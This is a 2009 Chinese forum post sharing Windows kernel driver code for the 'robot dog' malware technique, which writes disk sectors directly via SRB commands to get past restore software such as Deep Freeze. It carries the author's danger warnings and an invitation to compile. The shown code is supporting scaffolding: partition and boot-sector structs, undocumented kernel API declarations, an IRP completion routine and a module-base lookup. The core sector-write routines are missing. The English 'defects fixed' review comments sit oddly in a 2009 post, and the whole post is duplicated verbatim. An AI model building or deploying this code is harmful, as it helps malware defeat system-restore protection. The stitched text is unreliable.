机器狗穿透还原的磁盘级文件读写完整驱动代码
作者:admin 日期:2009-11-09
信息来源:*八进制信息安全团队
备注:获取文件在扇区的位置后,向磁盘驱动发送srb命令读写扇区,来穿透冰点等还原软件。
编译时注意:FileSystemControl的数据结构需要自己添加。
警告:本代码有一定的危险性,纯粹为了研究、学习,勿滥用!
以下给出关键代码 擅长C++的可以去编译下
本人实验N次 虚拟机虽然装了影子系统但是 一直疯狂蓝屏 代码具有高危险性
慎用!后果自负!!!
#include<ntddk.h>
#include<srb.h>
/* FSCTL that maps a file's virtual cluster numbers (VCNs) to the logical
 * cluster numbers (LCNs) on its volume; this is how the driver learns which
 * clusters a file occupies.  The value agrees with the public CTL_CODE
 * definition in winioctl.h. */
#define FSCTL_GET_RETRIEVAL_POINTERS 0x90073
/* MBR partition-type bytes as found in PARTITION_ENTRY.PartitionType. */
#define PARTITION_TYPE_NTFS 0x07
#define PARTITION_TYPE_FAT32 0x0B
#define PARTITION_TYPE_FAT32_LBA 0x0C
/* Exported by ntoskrnl; needed by ObReferenceObjectByName to look a driver
 * object up by name. */
extern POBJECT_TYPE* IoDriverObjectType;
/* Module-wide state.  Neither variable is touched in the part of the file
 * shown here -- presumably the physical byte offset of the sector being
 * accessed and the volume's cluster size; confirm against the code that sets
 * them.  They are plain globals with no locking, so two concurrent requests
 * would race on them. */
LARGE_INTEGER realdiskpos;
ULONG sectorspercluster;
/* Output buffer of FSCTL_GET_RETRIEVAL_POINTERS (same layout as the public
 * winioctl.h declaration).  Extents[1] is the usual "one element, grow the
 * allocation" trick: the caller must size the buffer for ExtentCount entries,
 * and the file system reports how many fit.  Each extent runs from the
 * previous NextVcn (or StartingVcn for the first) up to NextVcn and starts
 * at cluster Lcn on disk. */
typedef struct RETRIEVAL_POINTERS_BUFFER {
ULONG ExtentCount;
LARGE_INTEGER StartingVcn;
struct {
LARGE_INTEGER NextVcn;
LARGE_INTEGER Lcn;
} Extents[1];
} RETRIEVAL_POINTERS_BUFFER, *PRETRIEVAL_POINTERS_BUFFER;
/* Input buffer of FSCTL_GET_RETRIEVAL_POINTERS: the VCN at which the
 * extent enumeration should start (0 for the beginning of the file). */
typedef struct { LARGE_INTEGER StartingVcn;
} STARTING_VCN_INPUT_BUFFER, *PSTARTING_VCN_INPUT_BUFFER;
/* 18-byte fixed-format SCSI sense data returned with a failed SRB.
 * NOTE(review): this is a flattened copy of the scsi.h declaration -- there
 * the first byte is ErrorCode:7/Valid:1 and the third byte is
 * SenseKey:4 plus flag bits (one of them FileMark).  Here "Valid" and
 * "FileMark" name the whole byte, so mask the bits before interpreting them.
 * Byte offsets are unchanged, so the struct can still overlay a sense
 * buffer. */
typedef struct _SENSE_DATA {
unsigned char Valid;
unsigned char SegmentNumber;
unsigned char FileMark;
unsigned char Information[4];
unsigned char AdditionalSenseLength;
unsigned char CommandSpecificInformation[4];
unsigned char AdditionalSenseCode;
unsigned char AdditionalSenseCodeQualifier;
unsigned char FieldReplaceableUnitCode;
unsigned char SenseKeySpecific[3];
} SENSE_DATA, *PSENSE_DATA;
#pragma pack(1)
/* One 16-byte entry of the MBR partition table (packed via the surrounding
 * #pragma pack(1)).  The CHS fields are legacy; the values actually usable
 * for addressing are PartitionType, StartLBA (first sector, relative to the
 * disk) and TotalSector.  Untrusted on-disk data: validate PartitionType and
 * the LBA range before using them to address the disk. */
typedef struct _PARTITION_ENTRY
{
UCHAR active;
UCHAR StartHead;
UCHAR StartSector;
UCHAR StartCylinder;
UCHAR PartitionType;
UCHAR EndHead;
UCHAR EndSector;
UCHAR EndCylinder;
ULONG StartLBA;
ULONG TotalSector;
} PARTITION_ENTRY, *PPARTITION_ENTRY;
/* Layout of sector 0 of an MBR-partitioned disk: 446 bytes of boot code,
 * four partition entries and the 0xAA55 boot signature (446+64+2 = 512
 * bytes).  Check Signature before trusting the partition table. */
typedef struct _MBR_SECTOR
{
UCHAR BootCode[446];
PARTITION_ENTRY Partition[4];
USHORT Signature;
} MBR_SECTOR, *PMBR_SECTOR;
/* Leading part of a FAT volume boot sector (the BIOS Parameter Block),
 * packed so the fields overlay the raw sector.  BytesPerSector,
 * SectorsPerCluster, ReservedSectors, NumberOfFATs and SectorsPerFAT32 are
 * what a cluster-to-sector translation needs; NumberOfSectors16 /
 * SectorsPerFAT16 are the FAT12/16 variants of the 32-bit fields.  Only the
 * first 40 bytes of the sector are declared.  Values come from disk and
 * should be range-checked (e.g. BytesPerSector and SectorsPerCluster must be
 * non-zero) before being used as divisors or multipliers. */
typedef struct _BBR_SECTOR
{
USHORT JmpCode;
UCHAR NopCode;
UCHAR OEMName[8];
USHORT BytesPerSector;
UCHAR SectorsPerCluster;
USHORT ReservedSectors;
UCHAR NumberOfFATs;
USHORT RootEntries;
USHORT NumberOfSectors16;
UCHAR MediaDescriptor;
USHORT SectorsPerFAT16;
USHORT SectorsPerTrack;
USHORT HeadsPerCylinder;
ULONG HiddenSectors;
ULONG NumberOfSectors32;
ULONG SectorsPerFAT32;
} BBR_SECTOR, *PBBR_SECTOR;
#pragma pack()
/* One entry of the undocumented SystemModuleInformation (class 11) reply:
 * the buffer holds a ULONG count followed by this many entries.  Base is the
 * image load address; ImageName holds the path and ModuleNameOffset the
 * offset of the bare file name inside it.
 * NOTE(review): the commonly published RTL_PROCESS_MODULE_INFORMATION has a
 * 256-byte path field; with 255 here the array stride still comes out to
 * 284 bytes on 32-bit builds only because of tail padding -- confirm before
 * building for any other target. */
typedef struct _SYSTEM_MODULE_INFORMATION {
ULONG Reserved[2];
PVOID Base;
ULONG Size;
ULONG Flags;
USHORT Index;
USHORT Unknown;
USHORT LoadCount;
USHORT ModuleNameOffset;
CHAR ImageName[255];
} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;
/* Undocumented ntoskrnl export: resolves an object-manager path (e.g. a
 * driver object, using *IoDriverObjectType) to a referenced object pointer.
 * On success the caller owns one reference and must release it with
 * ObDereferenceObject. */
NTSYSAPI
NTSTATUS
NTAPI
ObReferenceObjectByName(
IN PUNICODE_STRING ObjectName,
IN ULONG Attributes,
IN PACCESS_STATE AccessState OPTIONAL,
IN ACCESS_MASK DesiredAccess OPTIONAL,
IN POBJECT_TYPE ObjectType,
IN KPROCESSOR_MODE AccessMode,
IN OUT PVOID ParseContext OPTIONAL,
OUT PVOID* Object );
/* Undocumented system-information query used below with class 11
 * (SystemModuleInformation).  Called with a too-small buffer it fails and
 * stores the required size in *ReturnLength; PASSIVE_LEVEL only. */
NTSYSAPI
NTSTATUS
NTAPI
ZwQuerySystemInformation(
IN ULONG SystemInformationClass,
IN OUT PVOID SystemInformation,
IN ULONG SystemInformationLength,
OUT PULONG ReturnLength);
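/*
 * Completion routine for IRPs this driver allocates itself and sends down
 * to a lower device.
 *
 * Copies the final status into the caller-supplied IO_STATUS_BLOCK, releases
 * the MDL attached to the IRP when Context is NULL, signals the caller's
 * event and frees the IRP.  Returning STATUS_MORE_PROCESSING_REQUIRED stops
 * the I/O manager from touching the (now freed) IRP again, which is why every
 * resource hung off the IRP must be released here and nowhere else.
 *
 * Requires: Irp->UserIosb and Irp->UserEvent set by the caller (no NULL
 *           check -- a NULL here is a caller bug).
 * Context:  NULL  -> this routine owns Irp->MdlAddress and frees it
 *                    (only the first MDL; a chained MDL is not walked);
 *           other -> the caller keeps ownership of the MDL.
 *           Inferred from the code; the callers are not in view.
 * The waiter must not free the IRP after the event is signalled -- that is
 * done here.  Completion routines can run at DISPATCH_LEVEL; everything
 * called below is permitted there.
 *
 * Changes from the original: %d replaced by %lu with an explicit cast
 * (IoStatus.Information is ULONG_PTR), the freed MDL is unlinked from the
 * IRP, and the unused DeviceObject is marked as such.
 */
NTSTATUS
IrpCompletionRoutine(
IN PDEVICE_OBJECT DeviceObject,
IN PIRP Irp,
IN PVOID Context
){
    PMDL mdl;

    UNREFERENCED_PARAMETER(DeviceObject);

    Irp->UserIosb->Status = Irp->IoStatus.Status;
    Irp->UserIosb->Information = Irp->IoStatus.Information;

    if (Context == NULL) {
        mdl = Irp->MdlAddress;
        if (mdl != NULL) {
            /* Information is ULONG_PTR; %d is wrong on 64-bit builds. */
            DbgPrint("read size: %lu..", (ULONG)Irp->IoStatus.Information);
            MmUnlockPages(mdl);
            IoFreeMdl(mdl);
            /* Unlink so nothing can reach the freed MDL through the IRP. */
            Irp->MdlAddress = NULL;
        }
    }

    /* Signal before freeing: the waiter may keep UserEvent/UserIosb on its
     * stack, and nothing below touches them again. */
    KeSetEvent(Irp->UserEvent, IO_NO_INCREMENT, FALSE);
    IoFreeIrp(Irp);
    return STATUS_MORE_PROCESSING_REQUIRED;
}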
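/*
 * Second completion routine whose body was a verbatim copy of
 * IrpCompletionRoutine.  The symbol is kept so existing
 * IoSetCompletionRoutine callers still resolve; delegating to the primary
 * routine removes the duplicated cleanup logic so the two cannot drift
 * apart (same contract: copies status to UserIosb, frees the MDL when
 * Context is NULL, signals UserEvent, frees the IRP, and returns
 * STATUS_MORE_PROCESSING_REQUIRED).
 */
NTSTATUS IrpCompletionRoutine_0(
IN PDEVICE_OBJECT DeviceObject,
IN PIRP Irp,
IN PVOID Context
){
    return IrpCompletionRoutine(DeviceObject, Irp, Context);
}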
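/*
 * GetModuleBase -- return the load address of the first loaded kernel module
 * whose file name starts with `name` (case-insensitive prefix match, so
 * "ntoskrnl" also matches "ntoskrnl.exe"), or 0 when the module is not found
 * or any step fails.
 *
 * Uses ZwQuerySystemInformation(SystemModuleInformation = 11): the reply is
 * a ULONG entry count followed by that many SYSTEM_MODULE_INFORMATION
 * records.  PASSIVE_LEVEL only.
 *
 * Defects fixed relative to the original:
 *  - the loop never advanced through the entries (`module.ImageName`
 *    instead of `module[i].ImageName`), so only entry 0 was compared;
 *  - the pool allocation and the second query were unchecked, so a failed
 *    query (e.g. the module list grew between the two calls) scanned an
 *    unfilled buffer;
 *  - the name was strcpy'd into a 255-byte stack buffer from a field that is
 *    not guaranteed to be NUL-terminated; the comparison is now done in
 *    place and bounded by the size of ImageName, and ModuleNameOffset is
 *    range-checked before use;
 *  - a NULL or empty name returns 0 instead of faulting / matching entry 0.
 *
 * Returns a ULONG, which only holds a full address on 32-bit builds; the
 * interface is kept for existing callers.
 */
ULONG GetModuleBase(char* name){
    ULONG needed = 0;
    ULONG count, maxcount, i;
    SIZE_T namelen;
    PVOID pbuftmp;
    PSYSTEM_MODULE_INFORMATION module;
    NTSTATUS status;
    ULONG result = 0;

    if (name == NULL || name[0] == '\0') {
        return 0;
    }
    namelen = strlen(name);

    /* A zero-length buffer only reports the size needed in `needed`. */
    ZwQuerySystemInformation(11, &needed, 0, &needed);
    if (needed < sizeof(ULONG)) {
        return 0;
    }

    /* Tagged allocation so a leak is attributable in pool tracking. */
    pbuftmp = ExAllocatePoolWithTag(NonPagedPool, needed, 'bMdG');
    if (pbuftmp == NULL) {
        return 0;
    }

    status = ZwQuerySystemInformation(11, pbuftmp, needed, NULL);
    if (!NT_SUCCESS(status)) {
        /* Treat any failure as "not found" rather than scanning garbage. */
        ExFreePool(pbuftmp);
        return 0;
    }

    count = *(PULONG)pbuftmp;
    module = (PSYSTEM_MODULE_INFORMATION)((PULONG)pbuftmp + 1);

    /* Clamp the count to what the allocation can hold so a bad count can
     * never carry the loop past the end of the buffer. */
    maxcount = (needed - sizeof(ULONG)) / sizeof(SYSTEM_MODULE_INFORMATION);
    if (count > maxcount) {
        count = maxcount;
    }

    for (i = 0; i < count; i++) {
        USHORT off = module[i].ModuleNameOffset;
        SIZE_T avail;

        /* ModuleNameOffset indexes into ImageName; never trust it blindly. */
        if (off >= sizeof module[i].ImageName) {
            continue;
        }
        avail = sizeof module[i].ImageName - off;

        /* _strnicmp reads at most namelen bytes and stops at a NUL, so
         * requiring namelen <= avail keeps every read inside ImageName. */
        if (namelen <= avail &&
            _strnicmp(module[i].ImageName + off, name, namelen) == 0) {
            result = (ULONG)(ULONG_PTR)module[i].Base;
            break;
        }
    }

    ExFreePool(pbuftmp);
    return result;
}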
备注:获取文件在扇区的位置后,向磁盘驱动发送srb命令读写扇区,来穿透冰点等还原软件。
编译时注意:FileSystemControl的数据结构需要自己添加。
警告:本代码有一定的危险性,纯粹为了研究、学习,勿滥用!
以下给出关键代码 擅长C++的可以去编译下
本人实验N次 虚拟机虽然装了影子系统但是 一直疯狂蓝屏 代码具有高危险性
慎用!后果自负!!!
#include<ntddk.h>
#include<srb.h>
/* FSCTL that maps a file's virtual cluster numbers (VCNs) to the logical
 * cluster numbers (LCNs) on its volume; this is how the driver learns which
 * clusters a file occupies.  The value agrees with the public CTL_CODE
 * definition in winioctl.h. */
#define FSCTL_GET_RETRIEVAL_POINTERS 0x90073
/* MBR partition-type bytes as found in PARTITION_ENTRY.PartitionType. */
#define PARTITION_TYPE_NTFS 0x07
#define PARTITION_TYPE_FAT32 0x0B
#define PARTITION_TYPE_FAT32_LBA 0x0C
/* Exported by ntoskrnl; needed by ObReferenceObjectByName to look a driver
 * object up by name. */
extern POBJECT_TYPE* IoDriverObjectType;
/* Module-wide state.  Neither variable is touched in the part of the file
 * shown here -- presumably the physical byte offset of the sector being
 * accessed and the volume's cluster size; confirm against the code that sets
 * them.  They are plain globals with no locking, so two concurrent requests
 * would race on them. */
LARGE_INTEGER realdiskpos;
ULONG sectorspercluster;
/* Output buffer of FSCTL_GET_RETRIEVAL_POINTERS (same layout as the public
 * winioctl.h declaration).  Extents[1] is the usual "one element, grow the
 * allocation" trick: the caller must size the buffer for ExtentCount entries,
 * and the file system reports how many fit.  Each extent runs from the
 * previous NextVcn (or StartingVcn for the first) up to NextVcn and starts
 * at cluster Lcn on disk. */
typedef struct RETRIEVAL_POINTERS_BUFFER {
ULONG ExtentCount;
LARGE_INTEGER StartingVcn;
struct {
LARGE_INTEGER NextVcn;
LARGE_INTEGER Lcn;
} Extents[1];
} RETRIEVAL_POINTERS_BUFFER, *PRETRIEVAL_POINTERS_BUFFER;
/* Input buffer of FSCTL_GET_RETRIEVAL_POINTERS: the VCN at which the
 * extent enumeration should start (0 for the beginning of the file). */
typedef struct { LARGE_INTEGER StartingVcn;
} STARTING_VCN_INPUT_BUFFER, *PSTARTING_VCN_INPUT_BUFFER;
/* 18-byte fixed-format SCSI sense data returned with a failed SRB.
 * NOTE(review): this is a flattened copy of the scsi.h declaration -- there
 * the first byte is ErrorCode:7/Valid:1 and the third byte is
 * SenseKey:4 plus flag bits (one of them FileMark).  Here "Valid" and
 * "FileMark" name the whole byte, so mask the bits before interpreting them.
 * Byte offsets are unchanged, so the struct can still overlay a sense
 * buffer. */
typedef struct _SENSE_DATA {
unsigned char Valid;
unsigned char SegmentNumber;
unsigned char FileMark;
unsigned char Information[4];
unsigned char AdditionalSenseLength;
unsigned char CommandSpecificInformation[4];
unsigned char AdditionalSenseCode;
unsigned char AdditionalSenseCodeQualifier;
unsigned char FieldReplaceableUnitCode;
unsigned char SenseKeySpecific[3];
} SENSE_DATA, *PSENSE_DATA;
#pragma pack(1)
/* One 16-byte entry of the MBR partition table (packed via the surrounding
 * #pragma pack(1)).  The CHS fields are legacy; the values actually usable
 * for addressing are PartitionType, StartLBA (first sector, relative to the
 * disk) and TotalSector.  Untrusted on-disk data: validate PartitionType and
 * the LBA range before using them to address the disk. */
typedef struct _PARTITION_ENTRY
{
UCHAR active;
UCHAR StartHead;
UCHAR StartSector;
UCHAR StartCylinder;
UCHAR PartitionType;
UCHAR EndHead;
UCHAR EndSector;
UCHAR EndCylinder;
ULONG StartLBA;
ULONG TotalSector;
} PARTITION_ENTRY, *PPARTITION_ENTRY;
/* Layout of sector 0 of an MBR-partitioned disk: 446 bytes of boot code,
 * four partition entries and the 0xAA55 boot signature (446+64+2 = 512
 * bytes).  Check Signature before trusting the partition table. */
typedef struct _MBR_SECTOR
{
UCHAR BootCode[446];
PARTITION_ENTRY Partition[4];
USHORT Signature;
} MBR_SECTOR, *PMBR_SECTOR;
/* Leading part of a FAT volume boot sector (the BIOS Parameter Block),
 * packed so the fields overlay the raw sector.  BytesPerSector,
 * SectorsPerCluster, ReservedSectors, NumberOfFATs and SectorsPerFAT32 are
 * what a cluster-to-sector translation needs; NumberOfSectors16 /
 * SectorsPerFAT16 are the FAT12/16 variants of the 32-bit fields.  Only the
 * first 40 bytes of the sector are declared.  Values come from disk and
 * should be range-checked (e.g. BytesPerSector and SectorsPerCluster must be
 * non-zero) before being used as divisors or multipliers. */
typedef struct _BBR_SECTOR
{
USHORT JmpCode;
UCHAR NopCode;
UCHAR OEMName[8];
USHORT BytesPerSector;
UCHAR SectorsPerCluster;
USHORT ReservedSectors;
UCHAR NumberOfFATs;
USHORT RootEntries;
USHORT NumberOfSectors16;
UCHAR MediaDescriptor;
USHORT SectorsPerFAT16;
USHORT SectorsPerTrack;
USHORT HeadsPerCylinder;
ULONG HiddenSectors;
ULONG NumberOfSectors32;
ULONG SectorsPerFAT32;
} BBR_SECTOR, *PBBR_SECTOR;
#pragma pack()
/* One entry of the undocumented SystemModuleInformation (class 11) reply:
 * the buffer holds a ULONG count followed by this many entries.  Base is the
 * image load address; ImageName holds the path and ModuleNameOffset the
 * offset of the bare file name inside it.
 * NOTE(review): the commonly published RTL_PROCESS_MODULE_INFORMATION has a
 * 256-byte path field; with 255 here the array stride still comes out to
 * 284 bytes on 32-bit builds only because of tail padding -- confirm before
 * building for any other target. */
typedef struct _SYSTEM_MODULE_INFORMATION {
ULONG Reserved[2];
PVOID Base;
ULONG Size;
ULONG Flags;
USHORT Index;
USHORT Unknown;
USHORT LoadCount;
USHORT ModuleNameOffset;
CHAR ImageName[255];
} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;
/* Undocumented ntoskrnl export: resolves an object-manager path (e.g. a
 * driver object, using *IoDriverObjectType) to a referenced object pointer.
 * On success the caller owns one reference and must release it with
 * ObDereferenceObject. */
NTSYSAPI
NTSTATUS
NTAPI
ObReferenceObjectByName(
IN PUNICODE_STRING ObjectName,
IN ULONG Attributes,
IN PACCESS_STATE AccessState OPTIONAL,
IN ACCESS_MASK DesiredAccess OPTIONAL,
IN POBJECT_TYPE ObjectType,
IN KPROCESSOR_MODE AccessMode,
IN OUT PVOID ParseContext OPTIONAL,
OUT PVOID* Object );
/* Undocumented system-information query used below with class 11
 * (SystemModuleInformation).  Called with a too-small buffer it fails and
 * stores the required size in *ReturnLength; PASSIVE_LEVEL only. */
NTSYSAPI
NTSTATUS
NTAPI
ZwQuerySystemInformation(
IN ULONG SystemInformationClass,
IN OUT PVOID SystemInformation,
IN ULONG SystemInformationLength,
OUT PULONG ReturnLength);
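/*
 * Completion routine for IRPs this driver allocates itself and sends down
 * to a lower device.
 *
 * Copies the final status into the caller-supplied IO_STATUS_BLOCK, releases
 * the MDL attached to the IRP when Context is NULL, signals the caller's
 * event and frees the IRP.  Returning STATUS_MORE_PROCESSING_REQUIRED stops
 * the I/O manager from touching the (now freed) IRP again, which is why every
 * resource hung off the IRP must be released here and nowhere else.
 *
 * Requires: Irp->UserIosb and Irp->UserEvent set by the caller (no NULL
 *           check -- a NULL here is a caller bug).
 * Context:  NULL  -> this routine owns Irp->MdlAddress and frees it
 *                    (only the first MDL; a chained MDL is not walked);
 *           other -> the caller keeps ownership of the MDL.
 *           Inferred from the code; the callers are not in view.
 * The waiter must not free the IRP after the event is signalled -- that is
 * done here.  Completion routines can run at DISPATCH_LEVEL; everything
 * called below is permitted there.
 *
 * Changes from the original: %d replaced by %lu with an explicit cast
 * (IoStatus.Information is ULONG_PTR), the freed MDL is unlinked from the
 * IRP, and the unused DeviceObject is marked as such.
 */
NTSTATUS
IrpCompletionRoutine(
IN PDEVICE_OBJECT DeviceObject,
IN PIRP Irp,
IN PVOID Context
){
    PMDL mdl;

    UNREFERENCED_PARAMETER(DeviceObject);

    Irp->UserIosb->Status = Irp->IoStatus.Status;
    Irp->UserIosb->Information = Irp->IoStatus.Information;

    if (Context == NULL) {
        mdl = Irp->MdlAddress;
        if (mdl != NULL) {
            /* Information is ULONG_PTR; %d is wrong on 64-bit builds. */
            DbgPrint("read size: %lu..", (ULONG)Irp->IoStatus.Information);
            MmUnlockPages(mdl);
            IoFreeMdl(mdl);
            /* Unlink so nothing can reach the freed MDL through the IRP. */
            Irp->MdlAddress = NULL;
        }
    }

    /* Signal before freeing: the waiter may keep UserEvent/UserIosb on its
     * stack, and nothing below touches them again. */
    KeSetEvent(Irp->UserEvent, IO_NO_INCREMENT, FALSE);
    IoFreeIrp(Irp);
    return STATUS_MORE_PROCESSING_REQUIRED;
}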
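/*
 * Second completion routine whose body was a verbatim copy of
 * IrpCompletionRoutine.  The symbol is kept so existing
 * IoSetCompletionRoutine callers still resolve; delegating to the primary
 * routine removes the duplicated cleanup logic so the two cannot drift
 * apart (same contract: copies status to UserIosb, frees the MDL when
 * Context is NULL, signals UserEvent, frees the IRP, and returns
 * STATUS_MORE_PROCESSING_REQUIRED).
 */
NTSTATUS IrpCompletionRoutine_0(
IN PDEVICE_OBJECT DeviceObject,
IN PIRP Irp,
IN PVOID Context
){
    return IrpCompletionRoutine(DeviceObject, Irp, Context);
}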
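/*
 * GetModuleBase -- return the load address of the first loaded kernel module
 * whose file name starts with `name` (case-insensitive prefix match, so
 * "ntoskrnl" also matches "ntoskrnl.exe"), or 0 when the module is not found
 * or any step fails.
 *
 * Uses ZwQuerySystemInformation(SystemModuleInformation = 11): the reply is
 * a ULONG entry count followed by that many SYSTEM_MODULE_INFORMATION
 * records.  PASSIVE_LEVEL only.
 *
 * Defects fixed relative to the original:
 *  - the loop never advanced through the entries (`module.ImageName`
 *    instead of `module[i].ImageName`), so only entry 0 was compared;
 *  - the pool allocation and the second query were unchecked, so a failed
 *    query (e.g. the module list grew between the two calls) scanned an
 *    unfilled buffer;
 *  - the name was strcpy'd into a 255-byte stack buffer from a field that is
 *    not guaranteed to be NUL-terminated; the comparison is now done in
 *    place and bounded by the size of ImageName, and ModuleNameOffset is
 *    range-checked before use;
 *  - a NULL or empty name returns 0 instead of faulting / matching entry 0.
 *
 * Returns a ULONG, which only holds a full address on 32-bit builds; the
 * interface is kept for existing callers.
 */
ULONG GetModuleBase(char* name){
    ULONG needed = 0;
    ULONG count, maxcount, i;
    SIZE_T namelen;
    PVOID pbuftmp;
    PSYSTEM_MODULE_INFORMATION module;
    NTSTATUS status;
    ULONG result = 0;

    if (name == NULL || name[0] == '\0') {
        return 0;
    }
    namelen = strlen(name);

    /* A zero-length buffer only reports the size needed in `needed`. */
    ZwQuerySystemInformation(11, &needed, 0, &needed);
    if (needed < sizeof(ULONG)) {
        return 0;
    }

    /* Tagged allocation so a leak is attributable in pool tracking. */
    pbuftmp = ExAllocatePoolWithTag(NonPagedPool, needed, 'bMdG');
    if (pbuftmp == NULL) {
        return 0;
    }

    status = ZwQuerySystemInformation(11, pbuftmp, needed, NULL);
    if (!NT_SUCCESS(status)) {
        /* Treat any failure as "not found" rather than scanning garbage. */
        ExFreePool(pbuftmp);
        return 0;
    }

    count = *(PULONG)pbuftmp;
    module = (PSYSTEM_MODULE_INFORMATION)((PULONG)pbuftmp + 1);

    /* Clamp the count to what the allocation can hold so a bad count can
     * never carry the loop past the end of the buffer. */
    maxcount = (needed - sizeof(ULONG)) / sizeof(SYSTEM_MODULE_INFORMATION);
    if (count > maxcount) {
        count = maxcount;
    }

    for (i = 0; i < count; i++) {
        USHORT off = module[i].ModuleNameOffset;
        SIZE_T avail;

        /* ModuleNameOffset indexes into ImageName; never trust it blindly. */
        if (off >= sizeof module[i].ImageName) {
            continue;
        }
        avail = sizeof module[i].ImageName - off;

        /* _strnicmp reads at most namelen bytes and stops at a NUL, so
         * requiring namelen <= avail keeps every read inside ImageName. */
        if (namelen <= avail &&
            _strnicmp(module[i].ImageName + off, name, namelen) == 0) {
            result = (ULONG)(ULONG_PTR)module[i].Base;
            break;
        }
    }

    ExFreePool(pbuftmp);
    return result;
}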